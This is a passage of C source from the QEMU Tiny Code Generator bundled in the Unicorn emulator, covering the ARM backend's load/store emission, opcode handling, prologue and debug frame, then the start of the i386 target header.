dl, addrlo, addend); } else if (dl != addend) { tcg_out_ld32_rwb(s, COND_AL, dl, addend, addrlo); tcg_out_ld32_12(s, COND_AL, dh, addend, 4); } else { tcg_out_dat_reg(s, COND_AL, ARITH_ADD, TCG_REG_TMP, addend, addrlo, SHIFT_IMM_LSL(0)); tcg_out_ld32_12(s, COND_AL, dl, TCG_REG_TMP, 0); tcg_out_ld32_12(s, COND_AL, dh, TCG_REG_TMP, 4); } if (bswap) { tcg_out_bswap32(s, COND_AL, dl, dl); tcg_out_bswap32(s, COND_AL, dh, dh); } } break; } } static inline void tcg_out_qemu_ld_direct(TCGContext *s, MemOp opc, TCGReg datalo, TCGReg datahi, TCGReg addrlo) { MemOp bswap = opc & MO_BSWAP; switch (opc & MO_SSIZE) { case MO_UB: tcg_out_ld8_12(s, COND_AL, datalo, addrlo, 0); break; case MO_SB: tcg_out_ld8s_8(s, COND_AL, datalo, addrlo, 0); break; case MO_UW: tcg_out_ld16u_8(s, COND_AL, datalo, addrlo, 0); if (bswap) { tcg_out_bswap16(s, COND_AL, datalo, datalo); } break; case MO_SW: if (bswap) { tcg_out_ld16u_8(s, COND_AL, datalo, addrlo, 0); tcg_out_bswap16s(s, COND_AL, datalo, datalo); } else { tcg_out_ld16s_8(s, COND_AL, datalo, addrlo, 0); } break; case MO_UL: default: tcg_out_ld32_12(s, COND_AL, datalo, addrlo, 0); if (bswap) { tcg_out_bswap32(s, COND_AL, datalo, datalo); } break; case MO_Q: { TCGReg dl = (bswap ? datahi : datalo); TCGReg dh = (bswap ? datalo : datahi); /* Avoid ldrd for user-only emulation, to handle unaligned. */ if (USING_SOFTMMU && use_armv6_instructions && (dl & 1) == 0 && dh == dl + 1) { tcg_out_ldrd_8(s, COND_AL, dl, addrlo, 0); } else if (dl == addrlo) { tcg_out_ld32_12(s, COND_AL, dh, addrlo, bswap ? 0 : 4); tcg_out_ld32_12(s, COND_AL, dl, addrlo, bswap ? 4 : 0); } else { tcg_out_ld32_12(s, COND_AL, dl, addrlo, bswap ? 4 : 0); tcg_out_ld32_12(s, COND_AL, dh, addrlo, bswap ? 0 : 4); } if (bswap) { tcg_out_bswap32(s, COND_AL, dl, dl); tcg_out_bswap32(s, COND_AL, dh, dh); } } break; } } static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is64) { TCGReg addrlo, datalo, datahi, addrhi __attribute__((unused)); TCGMemOpIdx oi; MemOp opc; #ifdef CONFIG_SOFTMMU int mem_index; TCGReg addend; tcg_insn_unit *label_ptr; #endif datalo = *args++; datahi = (is64 ? *args++ : 0); addrlo = *args++; addrhi = (TARGET_LONG_BITS == 64 ? 
*args++ : 0); oi = *args++; opc = get_memop(oi); #ifdef CONFIG_SOFTMMU mem_index = get_mmuidx(oi); addend = tcg_out_tlb_read(s, addrlo, addrhi, opc, mem_index, 1); /* This is a conditional BL only to load a pointer within this opcode into LR for the slow path. We will not be using the value for a tail call. */ label_ptr = s->code_ptr; tcg_out_bl(s, COND_NE, 0); tcg_out_qemu_ld_index(s, opc, datalo, datahi, addrlo, addend); add_qemu_ldst_label(s, true, oi, datalo, datahi, addrlo, addrhi, s->code_ptr, label_ptr); #else /* !CONFIG_SOFTMMU */ if (guest_base) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP, guest_base); tcg_out_qemu_ld_index(s, opc, datalo, datahi, addrlo, TCG_REG_TMP); } else { tcg_out_qemu_ld_direct(s, opc, datalo, datahi, addrlo); } #endif } static inline void tcg_out_qemu_st_index(TCGContext *s, int cond, MemOp opc, TCGReg datalo, TCGReg datahi, TCGReg addrlo, TCGReg addend) { MemOp bswap = opc & MO_BSWAP; switch (opc & MO_SIZE) { case MO_8: tcg_out_st8_r(s, cond, datalo, addrlo, addend); break; case MO_16: if (bswap) { tcg_out_bswap16st(s, cond, TCG_REG_R0, datalo); tcg_out_st16_r(s, cond, TCG_REG_R0, addrlo, addend); } else { tcg_out_st16_r(s, cond, datalo, addrlo, addend); } break; case MO_32: default: if (bswap) { tcg_out_bswap32(s, cond, TCG_REG_R0, datalo); tcg_out_st32_r(s, cond, TCG_REG_R0, addrlo, addend); } else { tcg_out_st32_r(s, cond, datalo, addrlo, addend); } break; case MO_64: /* Avoid strd for user-only emulation, to handle unaligned. */ if (bswap) { tcg_out_bswap32(s, cond, TCG_REG_R0, datahi); tcg_out_st32_rwb(s, cond, TCG_REG_R0, addend, addrlo); tcg_out_bswap32(s, cond, TCG_REG_R0, datalo); tcg_out_st32_12(s, cond, TCG_REG_R0, addend, 4); } else if (USING_SOFTMMU && use_armv6_instructions && (datalo & 1) == 0 && datahi == datalo + 1) { tcg_out_strd_r(s, cond, datalo, addrlo, addend); } else { tcg_out_st32_rwb(s, cond, datalo, addend, addrlo); tcg_out_st32_12(s, cond, datahi, addend, 4); } break; } } static inline void tcg_out_qemu_st_direct(TCGContext *s, MemOp opc, TCGReg datalo, TCGReg datahi, TCGReg addrlo) { MemOp bswap = opc & MO_BSWAP; switch (opc & MO_SIZE) { case MO_8: tcg_out_st8_12(s, COND_AL, datalo, addrlo, 0); break; case MO_16: if (bswap) { tcg_out_bswap16st(s, COND_AL, TCG_REG_R0, datalo); tcg_out_st16_8(s, COND_AL, TCG_REG_R0, addrlo, 0); } else { tcg_out_st16_8(s, COND_AL, datalo, addrlo, 0); } break; case MO_32: default: if (bswap) { tcg_out_bswap32(s, COND_AL, TCG_REG_R0, datalo); tcg_out_st32_12(s, COND_AL, TCG_REG_R0, addrlo, 0); } else { tcg_out_st32_12(s, COND_AL, datalo, addrlo, 0); } break; case MO_64: /* Avoid strd for user-only emulation, to handle unaligned. */ if (bswap) { tcg_out_bswap32(s, COND_AL, TCG_REG_R0, datahi); tcg_out_st32_12(s, COND_AL, TCG_REG_R0, addrlo, 0); tcg_out_bswap32(s, COND_AL, TCG_REG_R0, datalo); tcg_out_st32_12(s, COND_AL, TCG_REG_R0, addrlo, 4); } else if (USING_SOFTMMU && use_armv6_instructions && (datalo & 1) == 0 && datahi == datalo + 1) { tcg_out_strd_8(s, COND_AL, datalo, addrlo, 0); } else { tcg_out_st32_12(s, COND_AL, datalo, addrlo, 0); tcg_out_st32_12(s, COND_AL, datahi, addrlo, 4); } break; } } static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is64) { TCGReg addrlo, datalo, datahi, addrhi __attribute__((unused)); TCGMemOpIdx oi; MemOp opc; #ifdef CONFIG_SOFTMMU int mem_index; TCGReg addend; tcg_insn_unit *label_ptr; #endif datalo = *args++; datahi = (is64 ? *args++ : 0); addrlo = *args++; addrhi = (TARGET_LONG_BITS == 64 ?
*args++ : 0); oi = *args++; opc = get_memop(oi); #ifdef CONFIG_SOFTMMU mem_index = get_mmuidx(oi); addend = tcg_out_tlb_read(s, addrlo, addrhi, opc, mem_index, 0); tcg_out_qemu_st_index(s, COND_EQ, opc, datalo, datahi, addrlo, addend); /* The conditional call must come last, as we're going to return here. */ label_ptr = s->code_ptr; tcg_out_bl(s, COND_NE, 0); add_qemu_ldst_label(s, false, oi, datalo, datahi, addrlo, addrhi, s->code_ptr, label_ptr); #else /* !CONFIG_SOFTMMU */ if (guest_base) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP, guest_base); tcg_out_qemu_st_index(s, COND_AL, opc, datalo, datahi, addrlo, TCG_REG_TMP); } else { tcg_out_qemu_st_direct(s, opc, datalo, datahi, addrlo); } #endif } static void tcg_out_epilogue(TCGContext *s); static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, const int *const_args) { TCGArg a0, a1, a2, a3, a4, a5; int c; switch (opc) { case INDEX_op_exit_tb: tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R0, args[0]); tcg_out_epilogue(s); break; case INDEX_op_goto_tb: { /* Indirect jump method */ intptr_t ptr, dif, dil; TCGReg base = TCG_REG_PC; tcg_debug_assert(s->tb_jmp_insn_offset == 0); ptr = (intptr_t)(s->tb_jmp_target_addr + args[0]); dif = ptr - ((intptr_t)s->code_ptr + 8); dil = sextract32(dif, 0, 12); if (dif != dil) { /* The TB is close, but outside the 12 bits addressable by the load. We can extend this to 20 bits with a sub of a shifted immediate from pc. In the vastly unlikely event the code requires more than 1MB, we'll use 2 insns and be no worse off. */ base = TCG_REG_R0; tcg_out_movi32(s, COND_AL, base, ptr - dil); } tcg_out_ld32_12(s, COND_AL, TCG_REG_PC, base, dil); set_jmp_reset_offset(s, args[0]); } break; case INDEX_op_goto_ptr: tcg_out_bx(s, COND_AL, args[0]); break; case INDEX_op_br: tcg_out_goto_label(s, COND_AL, arg_label(args[0])); break; case INDEX_op_ld8u_i32: tcg_out_ld8u(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_ld8s_i32: tcg_out_ld8s(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_ld16u_i32: tcg_out_ld16u(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_ld16s_i32: tcg_out_ld16s(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_ld_i32: tcg_out_ld32u(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_st8_i32: tcg_out_st8(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_st16_i32: tcg_out_st16(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_st_i32: tcg_out_st32(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_movcond_i32: /* Constraints mean that v2 is always in the same register as dest, * so we only need to do "if condition passed, move v1 to dest". 
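   A sketch of the pair emitted below, taking EQ as the example condition: cmp c1, c2; moveq dest, v1 - with CMN or MVN substituted when the constant operand encodes better negated or inverted.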
*/ tcg_out_dat_rIN(s, COND_AL, ARITH_CMP, ARITH_CMN, 0, args[1], args[2], const_args[2]); tcg_out_dat_rIK(s, tcg_cond_to_arm_cond[args[5]], ARITH_MOV, ARITH_MVN, args[0], 0, args[3], const_args[3]); break; case INDEX_op_add_i32: tcg_out_dat_rIN(s, COND_AL, ARITH_ADD, ARITH_SUB, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_sub_i32: if (const_args[1]) { if (const_args[2]) { tcg_out_movi32(s, COND_AL, args[0], args[1] - args[2]); } else { tcg_out_dat_rI(s, COND_AL, ARITH_RSB, args[0], args[2], args[1], 1); } } else { tcg_out_dat_rIN(s, COND_AL, ARITH_SUB, ARITH_ADD, args[0], args[1], args[2], const_args[2]); } break; case INDEX_op_and_i32: tcg_out_dat_rIK(s, COND_AL, ARITH_AND, ARITH_BIC, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_andc_i32: tcg_out_dat_rIK(s, COND_AL, ARITH_BIC, ARITH_AND, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_or_i32: c = ARITH_ORR; goto gen_arith; case INDEX_op_xor_i32: c = ARITH_EOR; /* Fall through. */ gen_arith: tcg_out_dat_rI(s, COND_AL, c, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_add2_i32: a0 = args[0], a1 = args[1], a2 = args[2]; a3 = args[3], a4 = args[4], a5 = args[5]; if (a0 == a3 || (a0 == a5 && !const_args[5])) { a0 = TCG_REG_TMP; } tcg_out_dat_rIN(s, COND_AL, ARITH_ADD | TO_CPSR, ARITH_SUB | TO_CPSR, a0, a2, a4, const_args[4]); tcg_out_dat_rIK(s, COND_AL, ARITH_ADC, ARITH_SBC, a1, a3, a5, const_args[5]); tcg_out_mov_reg(s, COND_AL, args[0], a0); break; case INDEX_op_sub2_i32: a0 = args[0], a1 = args[1], a2 = args[2]; a3 = args[3], a4 = args[4], a5 = args[5]; if ((a0 == a3 && !const_args[3]) || (a0 == a5 && !const_args[5])) { a0 = TCG_REG_TMP; } if (const_args[2]) { if (const_args[4]) { tcg_out_movi32(s, COND_AL, a0, a4); a4 = a0; } tcg_out_dat_rI(s, COND_AL, ARITH_RSB | TO_CPSR, a0, a4, a2, 1); } else { tcg_out_dat_rIN(s, COND_AL, ARITH_SUB | TO_CPSR, ARITH_ADD | TO_CPSR, a0, a2, a4, const_args[4]); } if (const_args[3]) { if (const_args[5]) { tcg_out_movi32(s, COND_AL, a1, a5); a5 = a1; } tcg_out_dat_rI(s, COND_AL, ARITH_RSC, a1, a5, a3, 1); } else { tcg_out_dat_rIK(s, COND_AL, ARITH_SBC, ARITH_ADC, a1, a3, a5, const_args[5]); } tcg_out_mov_reg(s, COND_AL, args[0], a0); break; case INDEX_op_neg_i32: tcg_out_dat_imm(s, COND_AL, ARITH_RSB, args[0], args[1], 0); break; case INDEX_op_not_i32: tcg_out_dat_reg(s, COND_AL, ARITH_MVN, args[0], 0, args[1], SHIFT_IMM_LSL(0)); break; case INDEX_op_mul_i32: tcg_out_mul32(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_mulu2_i32: tcg_out_umull32(s, COND_AL, args[0], args[1], args[2], args[3]); break; case INDEX_op_muls2_i32: tcg_out_smull32(s, COND_AL, args[0], args[1], args[2], args[3]); break; /* XXX: Perhaps args[2] & 0x1f is wrong */ case INDEX_op_shl_i32: c = const_args[2] ? SHIFT_IMM_LSL(args[2] & 0x1f) : SHIFT_REG_LSL(args[2]); goto gen_shift32; case INDEX_op_shr_i32: c = const_args[2] ? (args[2] & 0x1f) ? SHIFT_IMM_LSR(args[2] & 0x1f) : SHIFT_IMM_LSL(0) : SHIFT_REG_LSR(args[2]); goto gen_shift32; case INDEX_op_sar_i32: c = const_args[2] ? (args[2] & 0x1f) ? SHIFT_IMM_ASR(args[2] & 0x1f) : SHIFT_IMM_LSL(0) : SHIFT_REG_ASR(args[2]); goto gen_shift32; case INDEX_op_rotr_i32: c = const_args[2] ? (args[2] & 0x1f) ? SHIFT_IMM_ROR(args[2] & 0x1f) : SHIFT_IMM_LSL(0) : SHIFT_REG_ROR(args[2]); /* Fall through. */ gen_shift32: tcg_out_dat_reg(s, COND_AL, ARITH_MOV, args[0], 0, args[1], c); break; case INDEX_op_rotl_i32: if (const_args[2]) { tcg_out_dat_reg(s, COND_AL, ARITH_MOV, args[0], 0, args[1], ((0x20 - args[2]) & 0x1f) ? 
SHIFT_IMM_ROR((0x20 - args[2]) & 0x1f) : SHIFT_IMM_LSL(0)); } else { tcg_out_dat_imm(s, COND_AL, ARITH_RSB, TCG_REG_TMP, args[2], 0x20); tcg_out_dat_reg(s, COND_AL, ARITH_MOV, args[0], 0, args[1], SHIFT_REG_ROR(TCG_REG_TMP)); } break; case INDEX_op_ctz_i32: tcg_out_dat_reg(s, COND_AL, INSN_RBIT, TCG_REG_TMP, 0, args[1], 0); a1 = TCG_REG_TMP; goto do_clz; case INDEX_op_clz_i32: a1 = args[1]; do_clz: a0 = args[0]; a2 = args[2]; c = const_args[2]; if (c && a2 == 32) { tcg_out_dat_reg(s, COND_AL, INSN_CLZ, a0, 0, a1, 0); break; } tcg_out_dat_imm(s, COND_AL, ARITH_CMP, 0, a1, 0); tcg_out_dat_reg(s, COND_NE, INSN_CLZ, a0, 0, a1, 0); if (c || a0 != a2) { tcg_out_dat_rIK(s, COND_EQ, ARITH_MOV, ARITH_MVN, a0, 0, a2, c); } break; case INDEX_op_brcond_i32: tcg_out_dat_rIN(s, COND_AL, ARITH_CMP, ARITH_CMN, 0, args[0], args[1], const_args[1]); tcg_out_goto_label(s, tcg_cond_to_arm_cond[args[2]], arg_label(args[3])); break; case INDEX_op_setcond_i32: tcg_out_dat_rIN(s, COND_AL, ARITH_CMP, ARITH_CMN, 0, args[1], args[2], const_args[2]); tcg_out_dat_imm(s, tcg_cond_to_arm_cond[args[3]], ARITH_MOV, args[0], 0, 1); tcg_out_dat_imm(s, tcg_cond_to_arm_cond[tcg_invert_cond(args[3])], ARITH_MOV, args[0], 0, 0); break; case INDEX_op_brcond2_i32: c = tcg_out_cmp2(s, args, const_args); tcg_out_goto_label(s, tcg_cond_to_arm_cond[c], arg_label(args[5])); break; case INDEX_op_setcond2_i32: c = tcg_out_cmp2(s, args + 1, const_args + 1); tcg_out_dat_imm(s, tcg_cond_to_arm_cond[c], ARITH_MOV, args[0], 0, 1); tcg_out_dat_imm(s, tcg_cond_to_arm_cond[tcg_invert_cond(c)], ARITH_MOV, args[0], 0, 0); break; case INDEX_op_qemu_ld_i32: tcg_out_qemu_ld(s, args, 0); break; case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, args, 1); break; case INDEX_op_qemu_st_i32: tcg_out_qemu_st(s, args, 0); break; case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, args, 1); break; case INDEX_op_bswap16_i32: tcg_out_bswap16(s, COND_AL, args[0], args[1]); break; case INDEX_op_bswap32_i32: tcg_out_bswap32(s, COND_AL, args[0], args[1]); break; case INDEX_op_ext8s_i32: tcg_out_ext8s(s, COND_AL, args[0], args[1]); break; case INDEX_op_ext16s_i32: tcg_out_ext16s(s, COND_AL, args[0], args[1]); break; case INDEX_op_ext16u_i32: tcg_out_ext16u(s, COND_AL, args[0], args[1]); break; case INDEX_op_deposit_i32: tcg_out_deposit(s, COND_AL, args[0], args[2], args[3], args[4], const_args[2]); break; case INDEX_op_extract_i32: tcg_out_extract(s, COND_AL, args[0], args[1], args[2], args[3]); break; case INDEX_op_sextract_i32: tcg_out_sextract(s, COND_AL, args[0], args[1], args[2], args[3]); break; case INDEX_op_extract2_i32: /* ??? These optimizations vs zero should be generic. */ /* ??? But we can't substitute 2 for 1 in the opcode stream yet. */ if (const_args[1]) { if (const_args[2]) { tcg_out_movi(s, TCG_TYPE_REG, args[0], 0); } else { tcg_out_dat_reg(s, COND_AL, ARITH_MOV, args[0], 0, args[2], SHIFT_IMM_LSL(32 - args[3])); } } else if (const_args[2]) { tcg_out_dat_reg(s, COND_AL, ARITH_MOV, args[0], 0, args[1], SHIFT_IMM_LSR(args[3])); } else { /* We can do extract2 in 2 insns, vs the 3 required otherwise.
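   A sketch with ofs = args[3] and the inputs named lo/hi: mov tmp, hi, lsl #(32 - ofs); orr rd, tmp, lo, lsr #ofs - the low ofs bits of the high word become the high bits of the result.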
*/ tcg_out_dat_reg(s, COND_AL, ARITH_MOV, TCG_REG_TMP, 0, args[2], SHIFT_IMM_LSL(32 - args[3])); tcg_out_dat_reg(s, COND_AL, ARITH_ORR, args[0], TCG_REG_TMP, args[1], SHIFT_IMM_LSR(args[3])); } break; case INDEX_op_div_i32: tcg_out_sdiv(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_divu_i32: tcg_out_udiv(s, COND_AL, args[0], args[1], args[2]); break; case INDEX_op_mb: tcg_out_mb(s, args[0]); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_call: /* Always emitted via tcg_out_call. */ default: tcg_abort(); } } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef s_s = { .args_ct_str = { "s", "s" } }; static const TCGTargetOpDef r_l = { .args_ct_str = { "r", "l" } }; static const TCGTargetOpDef r_r_r = { .args_ct_str = { "r", "r", "r" } }; static const TCGTargetOpDef r_r_l = { .args_ct_str = { "r", "r", "l" } }; static const TCGTargetOpDef r_l_l = { .args_ct_str = { "r", "l", "l" } }; static const TCGTargetOpDef s_s_s = { .args_ct_str = { "s", "s", "s" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_r_rI = { .args_ct_str = { "r", "r", "rI" } }; static const TCGTargetOpDef r_r_rIN = { .args_ct_str = { "r", "r", "rIN" } }; static const TCGTargetOpDef r_r_rIK = { .args_ct_str = { "r", "r", "rIK" } }; static const TCGTargetOpDef r_r_r_r = { .args_ct_str = { "r", "r", "r", "r" } }; static const TCGTargetOpDef r_r_l_l = { .args_ct_str = { "r", "r", "l", "l" } }; static const TCGTargetOpDef s_s_s_s = { .args_ct_str = { "s", "s", "s", "s" } }; static const TCGTargetOpDef br = { .args_ct_str = { "r", "rIN" } }; static const TCGTargetOpDef ext2 = { .args_ct_str = { "r", "rZ", "rZ" } }; static const TCGTargetOpDef dep = { .args_ct_str = { "r", "0", "rZ" } }; static const TCGTargetOpDef movc = { .args_ct_str = { "r", "r", "rIN", "rIK", "0" } }; static const TCGTargetOpDef add2 = { .args_ct_str = { "r", "r", "r", "r", "rIN", "rIK" } }; static const TCGTargetOpDef sub2 = { .args_ct_str = { "r", "r", "rI", "rI", "rIN", "rIK" } }; static const TCGTargetOpDef br2 = { .args_ct_str = { "r", "r", "rI", "rI" } }; static const TCGTargetOpDef setc2 = { .args_ct_str = { "r", "r", "r", "rI", "rI" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: case INDEX_op_neg_i32: case INDEX_op_not_i32: case INDEX_op_bswap16_i32: case INDEX_op_bswap32_i32: case INDEX_op_ext8s_i32: case INDEX_op_ext16s_i32: case INDEX_op_ext16u_i32: case INDEX_op_extract_i32: case INDEX_op_sextract_i32: return &r_r; case INDEX_op_add_i32: case INDEX_op_sub_i32: case INDEX_op_setcond_i32: return &r_r_rIN; case INDEX_op_and_i32: case INDEX_op_andc_i32: case INDEX_op_clz_i32: case INDEX_op_ctz_i32: return &r_r_rIK; case INDEX_op_mul_i32: case INDEX_op_div_i32: case INDEX_op_divu_i32: return &r_r_r; case INDEX_op_mulu2_i32: case INDEX_op_muls2_i32: return &r_r_r_r; case INDEX_op_or_i32: case INDEX_op_xor_i32: return &r_r_rI; case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: case INDEX_op_rotl_i32: case INDEX_op_rotr_i32: return &r_r_ri; case INDEX_op_brcond_i32: return &br; case INDEX_op_deposit_i32: return 
&dep; case INDEX_op_extract2_i32: return &ext2; case INDEX_op_movcond_i32: return &movc; case INDEX_op_add2_i32: return &add2; case INDEX_op_sub2_i32: return &sub2; case INDEX_op_brcond2_i32: return &br2; case INDEX_op_setcond2_i32: return &setc2; case INDEX_op_qemu_ld_i32: return TARGET_LONG_BITS == 32 ? &r_l : &r_l_l; case INDEX_op_qemu_ld_i64: return TARGET_LONG_BITS == 32 ? &r_r_l : &r_r_l_l; case INDEX_op_qemu_st_i32: return TARGET_LONG_BITS == 32 ? &s_s : &s_s_s; case INDEX_op_qemu_st_i64: return TARGET_LONG_BITS == 32 ? &s_s_s : &s_s_s_s; default: return NULL; } } static void tcg_target_init(TCGContext *s) { /* Only probe for the platform and capabilities if we haven't already determined maximum values at compile time. */ #ifndef __ARM_ARCH_EXT_IDIV__ { unsigned long hwcap = qemu_getauxval(AT_HWCAP); use_idiv_instructions = (hwcap & HWCAP_ARM_IDIVA) != 0; } #endif if (__ARM_ARCH < 7) { const char *pl = (const char *)qemu_getauxval(AT_PLATFORM); if (pl != NULL && pl[0] == 'v' && pl[1] >= '4' && pl[1] <= '9') { arm_arch = pl[1] - '0'; } } s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffff; s->tcg_target_call_clobber_regs = 0; tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R12); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R14); s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_REG_CALL_STACK); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP); tcg_regset_set_reg(s->reserved_regs, TCG_REG_PC); } static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { tcg_out_ld32u(s, COND_AL, arg, arg1, arg2); } static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { tcg_out_st32(s, COND_AL, arg, arg1, arg2); } static inline bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { return false; } static inline bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { tcg_out_mov_reg(s, COND_AL, ret, arg); return true; } static inline void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg) { tcg_out_movi32(s, COND_AL, ret, arg); } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { int i; for (i = 0; i < count; ++i) { p[i] = INSN_NOP; } } /* Compute frame size via macros, to share between tcg_target_qemu_prologue and tcg_register_jit. */ #define PUSH_SIZE ((11 - 4 + 1 + 1) * sizeof(tcg_target_long)) #define FRAME_SIZE \ ((PUSH_SIZE \ + TCG_STATIC_CALL_ARGS_SIZE \ + CPU_TEMP_BUF_NLONGS * sizeof(long) \ + TCG_TARGET_STACK_ALIGN - 1) \ & -TCG_TARGET_STACK_ALIGN) #define STACK_ADDEND (FRAME_SIZE - PUSH_SIZE) static void tcg_target_qemu_prologue(TCGContext *s) { /* Calling convention requires us to save r4-r11 and lr. */ /* stmdb sp!, { r4 - r11, lr } */ tcg_out32(s, (COND_AL << 28) | 0x092d4ff0); /* Reserve callee argument and tcg temp space. */ tcg_out_dat_rI(s, COND_AL, ARITH_SUB, TCG_REG_CALL_STACK, TCG_REG_CALL_STACK, STACK_ADDEND, 1); tcg_set_frame(s, TCG_REG_CALL_STACK, TCG_STATIC_CALL_ARGS_SIZE, CPU_TEMP_BUF_NLONGS * sizeof(long)); tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); tcg_out_bx(s, COND_AL, tcg_target_call_iarg_regs[1]); /* * Return path for goto_ptr.
Set return value to 0, a-la exit_tb, * and fall through to the rest of the epilogue. */ s->code_gen_epilogue = s->code_ptr; tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R0, 0); tcg_out_epilogue(s); } static void tcg_out_epilogue(TCGContext *s) { /* Release local stack frame. */ tcg_out_dat_rI(s, COND_AL, ARITH_ADD, TCG_REG_CALL_STACK, TCG_REG_CALL_STACK, STACK_ADDEND, 1); /* ldmia sp!, { r4 - r11, pc } */ tcg_out32(s, (COND_AL << 28) | 0x08bd8ff0); } typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[4]; uint8_t fde_reg_ofs[18]; } DebugFrame; #define ELF_HOST_MACHINE EM_ARM /* We're expecting a 2 byte uleb128 encoded value. */ QEMU_BUILD_BUG_ON(FRAME_SIZE >= (1 << 14)); static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = 0x7c, /* sleb128 -4 */ .h.cie.return_column = 14, /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { 12, 13, /* DW_CFA_def_cfa sp, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) }, .fde_reg_ofs = { /* The following must match the stmdb in the prologue. */ 0x8e, 1, /* DW_CFA_offset, lr, -4 */ 0x8b, 2, /* DW_CFA_offset, r11, -8 */ 0x8a, 3, /* DW_CFA_offset, r10, -12 */ 0x89, 4, /* DW_CFA_offset, r9, -16 */ 0x88, 5, /* DW_CFA_offset, r8, -20 */ 0x87, 6, /* DW_CFA_offset, r7, -24 */ 0x86, 7, /* DW_CFA_offset, r6, -28 */ 0x85, 8, /* DW_CFA_offset, r5, -32 */ 0x84, 9, /* DW_CFA_offset, r4, -36 */ } }; void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame)); }

unicorn-2.1.1/qemu/tcg/i386/tcg-target.h

/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so,
subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef I386_TCG_TARGET_H #define I386_TCG_TARGET_H #define TCG_TARGET_INSN_UNIT_SIZE 1 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 31 #ifdef __x86_64__ # define TCG_TARGET_REG_BITS 64 # define TCG_TARGET_NB_REGS 32 #else # define TCG_TARGET_REG_BITS 32 # define TCG_TARGET_NB_REGS 24 #endif typedef enum { TCG_REG_EAX = 0, TCG_REG_ECX, TCG_REG_EDX, TCG_REG_EBX, TCG_REG_ESP, 